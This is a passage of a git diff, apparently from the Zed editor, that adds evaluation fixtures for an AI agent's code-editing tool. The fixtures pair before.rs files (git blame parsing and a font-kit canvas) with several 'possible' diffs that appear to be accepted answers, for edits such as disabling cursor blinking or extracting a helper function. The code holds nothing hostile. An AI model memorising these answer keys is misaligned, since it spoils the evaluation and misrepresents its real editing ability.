+ editor.go_to_hunk_before_or_after_position( + &snapshot, + position, + Direction::Next, + window, + cx, + ); + editor.expand_selected_diff_hunks(cx); + }); + } + }), + ) + .child( + IconButton::new(("prev-hunk", row as u64), IconName::ArrowUp) + .shape(IconButtonShape::Square) + .icon_size(IconSize::Small) + // .disabled(!has_multiple_hunks) + .tooltip({ + let focus_handle = editor.focus_handle(cx); + move |window, cx| { + Tooltip::for_action_in( + "Previous Hunk", + &GoToPreviousHunk, + &focus_handle, + window, + cx, + ) + } + }) + .on_click({ + let editor = editor.clone(); + move |_event, window, cx| { + editor.update(cx, |editor, cx| { + let snapshot = editor.snapshot(window, cx); + let point = + hunk_range.start.to_point(&snapshot.buffer_snapshot); + editor.go_to_hunk_before_or_after_position( + &snapshot, + point, + Direction::Prev, + window, + cx, + ); + editor.expand_selected_diff_hunks(cx); + }); + } + }), + ) + }, + ) + .into_any_element() +} diff --git a/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/possible-01.diff b/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/possible-01.diff new file mode 100644 index 0000000000000000000000000000000000000000..1a38a1967f94c974de491c712babb7882020d697 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/possible-01.diff @@ -0,0 +1,28 @@ +--- before.rs 2025-07-07 11:37:48.434629001 +0300 ++++ expected.rs 2025-07-14 10:33:53.346906775 +0300 +@@ -1780,11 +1780,11 @@ + cx.observe_window_activation(window, |editor, window, cx| { + let active = window.is_window_active(); + editor.blink_manager.update(cx, |blink_manager, cx| { +- if active { +- blink_manager.enable(cx); +- } else { +- blink_manager.disable(cx); +- } ++ // if active { ++ // blink_manager.enable(cx); ++ // } else { ++ // blink_manager.disable(cx); ++ // } + }); + }), + ], +@@ -18463,7 +18463,7 @@ + } + + self.blink_manager.update(cx, |blink_manager, cx| { +- blink_manager.enable(cx); ++ // 
blink_manager.enable(cx); + }); + self.show_cursor_names(window, cx); + self.buffer.update(cx, |buffer, cx| { diff --git a/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/possible-02.diff b/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/possible-02.diff new file mode 100644 index 0000000000000000000000000000000000000000..b484cce48f71b232ddaa947a73940b8bf11846c6 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/possible-02.diff @@ -0,0 +1,29 @@ +@@ -1778,13 +1778,13 @@ + cx.observe_global_in::(window, Self::settings_changed), + observe_buffer_font_size_adjustment(cx, |_, cx| cx.notify()), + cx.observe_window_activation(window, |editor, window, cx| { +- let active = window.is_window_active(); ++ // let active = window.is_window_active(); + editor.blink_manager.update(cx, |blink_manager, cx| { +- if active { +- blink_manager.enable(cx); +- } else { +- blink_manager.disable(cx); +- } ++ // if active { ++ // blink_manager.enable(cx); ++ // } else { ++ // blink_manager.disable(cx); ++ // } + }); + }), + ], +@@ -18463,7 +18463,7 @@ + } + + self.blink_manager.update(cx, |blink_manager, cx| { +- blink_manager.enable(cx); ++ // blink_manager.enable(cx); + }); + self.show_cursor_names(window, cx); + self.buffer.update(cx, |buffer, cx| { diff --git a/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/possible-03.diff b/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/possible-03.diff new file mode 100644 index 0000000000000000000000000000000000000000..431e34e48a250bff80efbd5a2cc20ecc25be1020 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/possible-03.diff @@ -0,0 +1,34 @@ +@@ -1774,17 +1774,17 @@ + cx.observe(&buffer, Self::on_buffer_changed), + cx.subscribe_in(&buffer, window, Self::on_buffer_event), + cx.observe_in(&display_map, window, Self::on_display_map_changed), +- cx.observe(&blink_manager, |_, _, cx| cx.notify()), ++ // cx.observe(&blink_manager, |_, 
_, cx| cx.notify()), + cx.observe_global_in::(window, Self::settings_changed), + observe_buffer_font_size_adjustment(cx, |_, cx| cx.notify()), + cx.observe_window_activation(window, |editor, window, cx| { +- let active = window.is_window_active(); ++ // let active = window.is_window_active(); + editor.blink_manager.update(cx, |blink_manager, cx| { +- if active { +- blink_manager.enable(cx); +- } else { +- blink_manager.disable(cx); +- } ++ // if active { ++ // blink_manager.enable(cx); ++ // } else { ++ // blink_manager.disable(cx); ++ // } + }); + }), + ], +@@ -18463,7 +18463,7 @@ + } + + self.blink_manager.update(cx, |blink_manager, cx| { +- blink_manager.enable(cx); ++ // blink_manager.enable(cx); + }); + self.show_cursor_names(window, cx); + self.buffer.update(cx, |buffer, cx| { diff --git a/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/possible-04.diff b/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/possible-04.diff new file mode 100644 index 0000000000000000000000000000000000000000..64a6b85dd3751407db65da74656b66ee1beaf58b --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/possible-04.diff @@ -0,0 +1,33 @@ +@@ -1774,17 +1774,17 @@ + cx.observe(&buffer, Self::on_buffer_changed), + cx.subscribe_in(&buffer, window, Self::on_buffer_event), + cx.observe_in(&display_map, window, Self::on_display_map_changed), +- cx.observe(&blink_manager, |_, _, cx| cx.notify()), ++ // cx.observe(&blink_manager, |_, _, cx| cx.notify()), + cx.observe_global_in::(window, Self::settings_changed), + observe_buffer_font_size_adjustment(cx, |_, cx| cx.notify()), + cx.observe_window_activation(window, |editor, window, cx| { + let active = window.is_window_active(); + editor.blink_manager.update(cx, |blink_manager, cx| { +- if active { +- blink_manager.enable(cx); +- } else { +- blink_manager.disable(cx); +- } ++ // if active { ++ // blink_manager.enable(cx); ++ // } else { ++ // blink_manager.disable(cx); ++ // } + }); + }), + 
], +@@ -18463,7 +18463,7 @@ + } + + self.blink_manager.update(cx, |blink_manager, cx| { +- blink_manager.enable(cx); ++ // blink_manager.enable(cx); + }); + self.show_cursor_names(window, cx); + self.buffer.update(cx, |buffer, cx| { diff --git a/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/before.rs b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/before.rs new file mode 100644 index 0000000000000000000000000000000000000000..36fccb513271265ff7ae3d54b6f974beeb809737 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/before.rs @@ -0,0 +1,371 @@ +use crate::commit::get_messages; +use crate::{GitRemote, Oid}; +use anyhow::{Context as _, Result, anyhow}; +use collections::{HashMap, HashSet}; +use futures::AsyncWriteExt; +use gpui::SharedString; +use serde::{Deserialize, Serialize}; +use std::process::Stdio; +use std::{ops::Range, path::Path}; +use text::Rope; +use time::OffsetDateTime; +use time::UtcOffset; +use time::macros::format_description; + +pub use git2 as libgit; + +#[derive(Debug, Clone, Default)] +pub struct Blame { + pub entries: Vec, + pub messages: HashMap, + pub remote_url: Option, +} + +#[derive(Clone, Debug, Default)] +pub struct ParsedCommitMessage { + pub message: SharedString, + pub permalink: Option, + pub pull_request: Option, + pub remote: Option, +} + +impl Blame { + pub async fn for_path( + git_binary: &Path, + working_directory: &Path, + path: &Path, + content: &Rope, + remote_url: Option, + ) -> Result { + let output = run_git_blame(git_binary, working_directory, path, content).await?; + let mut entries = parse_git_blame(&output)?; + entries.sort_unstable_by(|a, b| a.range.start.cmp(&b.range.start)); + + let mut unique_shas = HashSet::default(); + + for entry in entries.iter_mut() { + unique_shas.insert(entry.sha); + } + + let shas = unique_shas.into_iter().collect::>(); + let messages = get_messages(working_directory, &shas) + .await + .context("failed to get 
commit messages")?; + + Ok(Self { + entries, + messages, + remote_url, + }) + } +} + +const GIT_BLAME_NO_COMMIT_ERROR: &str = "fatal: no such ref: HEAD"; +const GIT_BLAME_NO_PATH: &str = "fatal: no such path"; + +async fn run_git_blame( + git_binary: &Path, + working_directory: &Path, + path: &Path, + contents: &Rope, +) -> Result { + let mut child = util::command::new_smol_command(git_binary) + .current_dir(working_directory) + .arg("blame") + .arg("--incremental") + .arg("--contents") + .arg("-") + .arg(path.as_os_str()) + .stdin(Stdio::piped()) + .stdout(Stdio::piped()) + .stderr(Stdio::piped()) + .spawn() + .context("starting git blame process")?; + + let stdin = child + .stdin + .as_mut() + .context("failed to get pipe to stdin of git blame command")?; + + for chunk in contents.chunks() { + stdin.write_all(chunk.as_bytes()).await?; + } + stdin.flush().await?; + + let output = child.output().await.context("reading git blame output")?; + + if !output.status.success() { + let stderr = String::from_utf8_lossy(&output.stderr); + let trimmed = stderr.trim(); + if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { + return Ok(String::new()); + } + anyhow::bail!("git blame process failed: {stderr}"); + } + + Ok(String::from_utf8(output.stdout)?) +} + +#[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] +pub struct BlameEntry { + pub sha: Oid, + + pub range: Range, + + pub original_line_number: u32, + + pub author: Option, + pub author_mail: Option, + pub author_time: Option, + pub author_tz: Option, + + pub committer_name: Option, + pub committer_email: Option, + pub committer_time: Option, + pub committer_tz: Option, + + pub summary: Option, + + pub previous: Option, + pub filename: String, +} + +impl BlameEntry { + // Returns a BlameEntry by parsing the first line of a `git blame --incremental` + // entry. 
The line MUST have this format: + // + // <40-byte-hex-sha1> + fn new_from_blame_line(line: &str) -> Result { + let mut parts = line.split_whitespace(); + + let sha = parts + .next() + .and_then(|line| line.parse::().ok()) + .with_context(|| format!("parsing sha from {line}"))?; + + let original_line_number = parts + .next() + .and_then(|line| line.parse::().ok()) + .with_context(|| format!("parsing original line number from {line}"))?; + let final_line_number = parts + .next() + .and_then(|line| line.parse::().ok()) + .with_context(|| format!("parsing final line number from {line}"))?; + + let line_count = parts + .next() + .and_then(|line| line.parse::().ok()) + .with_context(|| format!("parsing line count from {line}"))?; + + let start_line = final_line_number.saturating_sub(1); + let end_line = start_line + line_count; + let range = start_line..end_line; + + Ok(Self { + sha, + range, + original_line_number, + ..Default::default() + }) + } + + pub fn author_offset_date_time(&self) -> Result { + if let (Some(author_time), Some(author_tz)) = (self.author_time, &self.author_tz) { + let format = format_description!("[offset_hour][offset_minute]"); + let offset = UtcOffset::parse(author_tz, &format)?; + let date_time_utc = OffsetDateTime::from_unix_timestamp(author_time)?; + + Ok(date_time_utc.to_offset(offset)) + } else { + // Directly return current time in UTC if there's no committer time or timezone + Ok(time::OffsetDateTime::now_utc()) + } + } +} + +// parse_git_blame parses the output of `git blame --incremental`, which returns +// all the blame-entries for a given path incrementally, as it finds them. +// +// Each entry *always* starts with: +// +// <40-byte-hex-sha1> +// +// Each entry *always* ends with: +// +// filename +// +// Line numbers are 1-indexed. 
+// +// A `git blame --incremental` entry looks like this: +// +// 6ad46b5257ba16d12c5ca9f0d4900320959df7f4 2 2 1 +// author Joe Schmoe +// author-mail +// author-time 1709741400 +// author-tz +0100 +// committer Joe Schmoe +// committer-mail +// committer-time 1709741400 +// committer-tz +0100 +// summary Joe's cool commit +// previous 486c2409237a2c627230589e567024a96751d475 index.js +// filename index.js +// +// If the entry has the same SHA as an entry that was already printed then no +// signature information is printed: +// +// 6ad46b5257ba16d12c5ca9f0d4900320959df7f4 3 4 1 +// previous 486c2409237a2c627230589e567024a96751d475 index.js +// filename index.js +// +// More about `--incremental` output: https://mirrors.edge.kernel.org/pub/software/scm/git/docs/git-blame.html +fn parse_git_blame(output: &str) -> Result> { + let mut entries: Vec = Vec::new(); + let mut index: HashMap = HashMap::default(); + + let mut current_entry: Option = None; + + for line in output.lines() { + let mut done = false; + + match &mut current_entry { + None => { + let mut new_entry = BlameEntry::new_from_blame_line(line)?; + + if let Some(existing_entry) = index + .get(&new_entry.sha) + .and_then(|slot| entries.get(*slot)) + { + new_entry.author.clone_from(&existing_entry.author); + new_entry + .author_mail + .clone_from(&existing_entry.author_mail); + new_entry.author_time = existing_entry.author_time; + new_entry.author_tz.clone_from(&existing_entry.author_tz); + new_entry + .committer_name + .clone_from(&existing_entry.committer_name); + new_entry + .committer_email + .clone_from(&existing_entry.committer_email); + new_entry.committer_time = existing_entry.committer_time; + new_entry + .committer_tz + .clone_from(&existing_entry.committer_tz); + new_entry.summary.clone_from(&existing_entry.summary); + } + + current_entry.replace(new_entry); + } + Some(entry) => { + let Some((key, value)) = line.split_once(' ') else { + continue; + }; + let is_committed = !entry.sha.is_zero(); + 
match key { + "filename" => { + entry.filename = value.into(); + done = true; + } + "previous" => entry.previous = Some(value.into()), + + "summary" if is_committed => entry.summary = Some(value.into()), + "author" if is_committed => entry.author = Some(value.into()), + "author-mail" if is_committed => entry.author_mail = Some(value.into()), + "author-time" if is_committed => { + entry.author_time = Some(value.parse::()?) + } + "author-tz" if is_committed => entry.author_tz = Some(value.into()), + + "committer" if is_committed => entry.committer_name = Some(value.into()), + "committer-mail" if is_committed => entry.committer_email = Some(value.into()), + "committer-time" if is_committed => { + entry.committer_time = Some(value.parse::()?) + } + "committer-tz" if is_committed => entry.committer_tz = Some(value.into()), + _ => {} + } + } + }; + + if done { + if let Some(entry) = current_entry.take() { + index.insert(entry.sha, entries.len()); + + // We only want annotations that have a commit. + if !entry.sha.is_zero() { + entries.push(entry); + } + } + } + } + + Ok(entries) +} + +#[cfg(test)] +mod tests { + use std::path::PathBuf; + + use super::BlameEntry; + use super::parse_git_blame; + + fn read_test_data(filename: &str) -> String { + let mut path = PathBuf::from(env!("CARGO_MANIFEST_DIR")); + path.push("test_data"); + path.push(filename); + + std::fs::read_to_string(&path) + .unwrap_or_else(|_| panic!("Could not read test data at {:?}. Is it generated?", path)) + } + + fn assert_eq_golden(entries: &Vec, golden_filename: &str) { + let mut path = PathBuf::from(env!("CARGO_MANIFEST_DIR")); + path.push("test_data"); + path.push("golden"); + path.push(format!("{}.json", golden_filename)); + + let mut have_json = + serde_json::to_string_pretty(&entries).expect("could not serialize entries to JSON"); + // We always want to save with a trailing newline. 
+ have_json.push('\n'); + + let update = std::env::var("UPDATE_GOLDEN") + .map(|val| val.eq_ignore_ascii_case("true")) + .unwrap_or(false); + + if update { + std::fs::create_dir_all(path.parent().unwrap()) + .expect("could not create golden test data directory"); + std::fs::write(&path, have_json).expect("could not write out golden data"); + } else { + let want_json = + std::fs::read_to_string(&path).unwrap_or_else(|_| { + panic!("could not read golden test data file at {:?}. Did you run the test with UPDATE_GOLDEN=true before?", path); + }).replace("\r\n", "\n"); + + pretty_assertions::assert_eq!(have_json, want_json, "wrong blame entries"); + } + } + + #[test] + fn test_parse_git_blame_not_committed() { + let output = read_test_data("blame_incremental_not_committed"); + let entries = parse_git_blame(&output).unwrap(); + assert_eq_golden(&entries, "blame_incremental_not_committed"); + } + + #[test] + fn test_parse_git_blame_simple() { + let output = read_test_data("blame_incremental_simple"); + let entries = parse_git_blame(&output).unwrap(); + assert_eq_golden(&entries, "blame_incremental_simple"); + } + + #[test] + fn test_parse_git_blame_complex() { + let output = read_test_data("blame_incremental_complex"); + let entries = parse_git_blame(&output).unwrap(); + assert_eq_golden(&entries, "blame_incremental_complex"); + } +} diff --git a/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-01.diff b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-01.diff new file mode 100644 index 0000000000000000000000000000000000000000..c13a223c63f4226ac0f1bf5e7221551e586827f5 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-01.diff @@ -0,0 +1,11 @@ +@@ -94,6 +94,10 @@ + + let output = child.output().await.context("reading git blame output")?; + ++ handle_command_output(output) ++} ++ ++fn handle_command_output(output: std::process::Output) -> Result { + if 
!output.status.success() { + let stderr = String::from_utf8_lossy(&output.stderr); + let trimmed = stderr.trim(); diff --git a/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-02.diff b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-02.diff new file mode 100644 index 0000000000000000000000000000000000000000..aa36a9241e9706a3413277f07c7a2a0364df24b7 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-02.diff @@ -0,0 +1,26 @@ +@@ -95,15 +95,19 @@ + let output = child.output().await.context("reading git blame output")?; + + if !output.status.success() { +- let stderr = String::from_utf8_lossy(&output.stderr); +- let trimmed = stderr.trim(); +- if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { +- return Ok(String::new()); +- } +- anyhow::bail!("git blame process failed: {stderr}"); ++ return handle_command_output(output); + } + + Ok(String::from_utf8(output.stdout)?) 
++} ++ ++fn handle_command_output(output: std::process::Output) -> Result { ++ let stderr = String::from_utf8_lossy(&output.stderr); ++ let trimmed = stderr.trim(); ++ if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { ++ return Ok(String::new()); ++ } ++ anyhow::bail!("git blame process failed: {stderr}"); + } + + #[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] diff --git a/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-03.diff b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-03.diff new file mode 100644 index 0000000000000000000000000000000000000000..d3c19b43803941ca9c17ace5d72fe72d6c3361df --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-03.diff @@ -0,0 +1,11 @@ +@@ -93,7 +93,10 @@ + stdin.flush().await?; + + let output = child.output().await.context("reading git blame output")?; ++ handle_command_output(output) ++} + ++fn handle_command_output(output: std::process::Output) -> Result { + if !output.status.success() { + let stderr = String::from_utf8_lossy(&output.stderr); + let trimmed = stderr.trim(); diff --git a/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-04.diff b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-04.diff new file mode 100644 index 0000000000000000000000000000000000000000..1f87e4352c60ceb3df2fab57dd7b7e7e13dad95e --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-04.diff @@ -0,0 +1,24 @@ +@@ -93,17 +93,20 @@ + stdin.flush().await?; + + let output = child.output().await.context("reading git blame output")?; ++ handle_command_output(&output)?; ++ Ok(String::from_utf8(output.stdout)?) 
++} + ++fn handle_command_output(output: &std::process::Output) -> Result<()> { + if !output.status.success() { + let stderr = String::from_utf8_lossy(&output.stderr); + let trimmed = stderr.trim(); + if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { +- return Ok(String::new()); ++ return Ok(()); + } + anyhow::bail!("git blame process failed: {stderr}"); + } +- +- Ok(String::from_utf8(output.stdout)?) ++ Ok(()) + } + + #[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] diff --git a/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-05.diff b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-05.diff new file mode 100644 index 0000000000000000000000000000000000000000..8f4b745b9a1105a2ff6511c141ea7459edb47b77 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-05.diff @@ -0,0 +1,26 @@ +@@ -95,15 +95,19 @@ + let output = child.output().await.context("reading git blame output")?; + + if !output.status.success() { +- let stderr = String::from_utf8_lossy(&output.stderr); +- let trimmed = stderr.trim(); +- if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { +- return Ok(String::new()); +- } +- anyhow::bail!("git blame process failed: {stderr}"); ++ return handle_command_output(&output); + } + + Ok(String::from_utf8(output.stdout)?) 
++} ++ ++fn handle_command_output(output: &std::process::Output) -> Result { ++ let stderr = String::from_utf8_lossy(&output.stderr); ++ let trimmed = stderr.trim(); ++ if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { ++ return Ok(String::new()); ++ } ++ anyhow::bail!("git blame process failed: {stderr}"); + } + + #[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] diff --git a/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-06.diff b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-06.diff new file mode 100644 index 0000000000000000000000000000000000000000..3514d9c8e2969c7286398f41cd8e00e3172774a8 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-06.diff @@ -0,0 +1,23 @@ +@@ -93,7 +93,12 @@ + stdin.flush().await?; + + let output = child.output().await.context("reading git blame output")?; ++ handle_command_output(&output)?; + ++ Ok(String::from_utf8(output.stdout)?) ++} ++ ++fn handle_command_output(output: &std::process::Output) -> Result { + if !output.status.success() { + let stderr = String::from_utf8_lossy(&output.stderr); + let trimmed = stderr.trim(); +@@ -102,8 +107,7 @@ + } + anyhow::bail!("git blame process failed: {stderr}"); + } +- +- Ok(String::from_utf8(output.stdout)?) 
++ Ok(String::from_utf8_lossy(&output.stdout).into_owned()) + } + + #[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] diff --git a/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-07.diff b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-07.diff new file mode 100644 index 0000000000000000000000000000000000000000..9691479e2997ca654e1092499a880507c38b979c --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-07.diff @@ -0,0 +1,26 @@ +@@ -95,15 +95,19 @@ + let output = child.output().await.context("reading git blame output")?; + + if !output.status.success() { +- let stderr = String::from_utf8_lossy(&output.stderr); +- let trimmed = stderr.trim(); +- if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { +- return Ok(String::new()); +- } +- anyhow::bail!("git blame process failed: {stderr}"); ++ return handle_command_output(output); + } + + Ok(String::from_utf8(output.stdout)?) 
++} ++ ++fn handle_command_output(output: std::process::Output) -> Result { ++ let stderr = String::from_utf8_lossy(&output.stderr); ++ let trimmed = stderr.trim(); ++ if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { ++ return Ok(String::new()); ++ } ++ anyhow::bail!("git blame process failed: {stderr}"); + } + + #[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] diff --git a/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-08.diff b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-08.diff new file mode 100644 index 0000000000000000000000000000000000000000..f5da859005aef07d1c39e516d7c4688c575c7e9d --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-08.diff @@ -0,0 +1,26 @@ +@@ -95,15 +95,19 @@ + let output = child.output().await.context("reading git blame output")?; + + if !output.status.success() { +- let stderr = String::from_utf8_lossy(&output.stderr); +- let trimmed = stderr.trim(); +- if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { +- return Ok(String::new()); +- } +- anyhow::bail!("git blame process failed: {stderr}"); ++ return handle_command_output(output); + } + + Ok(String::from_utf8(output.stdout)?) 
++} ++ ++fn handle_command_output(output: std::process::Output) -> Result { ++ let stderr = String::from_utf8_lossy(&output.stderr); ++ let trimmed = stderr.trim(); ++ if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { ++ return Ok(String::new()); ++ } ++ anyhow::bail!("git blame process failed: {stderr}") + } + + #[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] diff --git a/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-09.diff b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-09.diff new file mode 100644 index 0000000000000000000000000000000000000000..6bc45657b3d6bf23b4542deb4f6016472a0e89b9 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-09.diff @@ -0,0 +1,20 @@ +@@ -5,7 +5,7 @@ + use futures::AsyncWriteExt; + use gpui::SharedString; + use serde::{Deserialize, Serialize}; +-use std::process::Stdio; ++use std::process::{Output, Stdio}; + use std::{ops::Range, path::Path}; + use text::Rope; + use time::OffsetDateTime; +@@ -94,6 +94,10 @@ + + let output = child.output().await.context("reading git blame output")?; + ++ handle_command_output(output) ++} ++ ++fn handle_command_output(output: Output) -> Result { + if !output.status.success() { + let stderr = String::from_utf8_lossy(&output.stderr); + let trimmed = stderr.trim(); diff --git a/crates/agent/src/tools/evals/fixtures/from_pixels_constructor/before.rs b/crates/agent/src/tools/evals/fixtures/from_pixels_constructor/before.rs new file mode 100644 index 0000000000000000000000000000000000000000..12590fe6e93dc61f5c319d650b637654c39707d3 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/from_pixels_constructor/before.rs @@ -0,0 +1,339 @@ +// font-kit/src/canvas.rs +// +// Copyright © 2018 The Pathfinder Project Developers. +// +// Licensed under the Apache License, Version 2.0 or the MIT license +// , at your +// option. 
This file may not be copied, modified, or distributed +// except according to those terms. + +//! An in-memory bitmap surface for glyph rasterization. + +use lazy_static::lazy_static; +use pathfinder_geometry::rect::RectI; +use pathfinder_geometry::vector::Vector2I; +use std::cmp; +use std::fmt; + +use crate::utils; + +lazy_static! { + static ref BITMAP_1BPP_TO_8BPP_LUT: [[u8; 8]; 256] = { + let mut lut = [[0; 8]; 256]; + for byte in 0..0x100 { + let mut value = [0; 8]; + for bit in 0..8 { + if (byte & (0x80 >> bit)) != 0 { + value[bit] = 0xff; + } + } + lut[byte] = value + } + lut + }; +} + +/// An in-memory bitmap surface for glyph rasterization. +pub struct Canvas { + /// The raw pixel data. + pub pixels: Vec, + /// The size of the buffer, in pixels. + pub size: Vector2I, + /// The number of *bytes* between successive rows. + pub stride: usize, + /// The image format of the canvas. + pub format: Format, +} + +impl Canvas { + /// Creates a new blank canvas with the given pixel size and format. + /// + /// Stride is automatically calculated from width. + /// + /// The canvas is initialized with transparent black (all values 0). + #[inline] + pub fn new(size: Vector2I, format: Format) -> Canvas { + Canvas::with_stride( + size, + size.x() as usize * format.bytes_per_pixel() as usize, + format, + ) + } + + /// Creates a new blank canvas with the given pixel size, stride (number of bytes between + /// successive rows), and format. + /// + /// The canvas is initialized with transparent black (all values 0). + pub fn with_stride(size: Vector2I, stride: usize, format: Format) -> Canvas { + Canvas { + pixels: vec![0; stride * size.y() as usize], + size, + stride, + format, + } + } + + #[allow(dead_code)] + pub(crate) fn blit_from_canvas(&mut self, src: &Canvas) { + self.blit_from( + Vector2I::default(), + &src.pixels, + src.size, + src.stride, + src.format, + ) + } + + /// Blits to a rectangle with origin at `dst_point` and size according to `src_size`. 
+ /// If the target area overlaps the boundaries of the canvas, only the drawable region is blitted. + /// `dst_point` and `src_size` are specified in pixels. `src_stride` is specified in bytes. + /// `src_stride` must be equal or larger than the actual data length. + #[allow(dead_code)] + pub(crate) fn blit_from( + &mut self, + dst_point: Vector2I, + src_bytes: &[u8], + src_size: Vector2I, + src_stride: usize, + src_format: Format, + ) { + assert_eq!( + src_stride * src_size.y() as usize, + src_bytes.len(), + "Number of pixels in src_bytes does not match stride and size." + ); + assert!( + src_stride >= src_size.x() as usize * src_format.bytes_per_pixel() as usize, + "src_stride must be >= than src_size.x()" + ); + + let dst_rect = RectI::new(dst_point, src_size); + let dst_rect = dst_rect.intersection(RectI::new(Vector2I::default(), self.size)); + let dst_rect = match dst_rect { + Some(dst_rect) => dst_rect, + None => return, + }; + + match (self.format, src_format) { + (Format::A8, Format::A8) + | (Format::Rgb24, Format::Rgb24) + | (Format::Rgba32, Format::Rgba32) => { + self.blit_from_with::(dst_rect, src_bytes, src_stride, src_format) + } + (Format::A8, Format::Rgb24) => { + self.blit_from_with::(dst_rect, src_bytes, src_stride, src_format) + } + (Format::Rgb24, Format::A8) => { + self.blit_from_with::(dst_rect, src_bytes, src_stride, src_format) + } + (Format::Rgb24, Format::Rgba32) => self + .blit_from_with::(dst_rect, src_bytes, src_stride, src_format), + (Format::Rgba32, Format::Rgb24) => self + .blit_from_with::(dst_rect, src_bytes, src_stride, src_format), + (Format::Rgba32, Format::A8) | (Format::A8, Format::Rgba32) => unimplemented!(), + } + } + + #[allow(dead_code)] + pub(crate) fn blit_from_bitmap_1bpp( + &mut self, + dst_point: Vector2I, + src_bytes: &[u8], + src_size: Vector2I, + src_stride: usize, + ) { + if self.format != Format::A8 { + unimplemented!() + } + + let dst_rect = RectI::new(dst_point, src_size); + let dst_rect = 
dst_rect.intersection(RectI::new(Vector2I::default(), self.size)); + let dst_rect = match dst_rect { + Some(dst_rect) => dst_rect, + None => return, + }; + + let size = dst_rect.size(); + + let dest_bytes_per_pixel = self.format.bytes_per_pixel() as usize; + let dest_row_stride = size.x() as usize * dest_bytes_per_pixel; + let src_row_stride = utils::div_round_up(size.x() as usize, 8); + + for y in 0..size.y() { + let (dest_row_start, src_row_start) = ( + (y + dst_rect.origin_y()) as usize * self.stride + + dst_rect.origin_x() as usize * dest_bytes_per_pixel, + y as usize * src_stride, + ); + let dest_row_end = dest_row_start + dest_row_stride; + let src_row_end = src_row_start + src_row_stride; + let dest_row_pixels = &mut self.pixels[dest_row_start..dest_row_end]; + let src_row_pixels = &src_bytes[src_row_start..src_row_end]; + for x in 0..src_row_stride { + let pattern = &BITMAP_1BPP_TO_8BPP_LUT[src_row_pixels[x] as usize]; + let dest_start = x * 8; + let dest_end = cmp::min(dest_start + 8, dest_row_stride); + let src = &pattern[0..(dest_end - dest_start)]; + dest_row_pixels[dest_start..dest_end].clone_from_slice(src); + } + } + } + + /// Blits to area `rect` using the data given in the buffer `src_bytes`. + /// `src_stride` must be specified in bytes. + /// The dimensions of `rect` must be in pixels. 
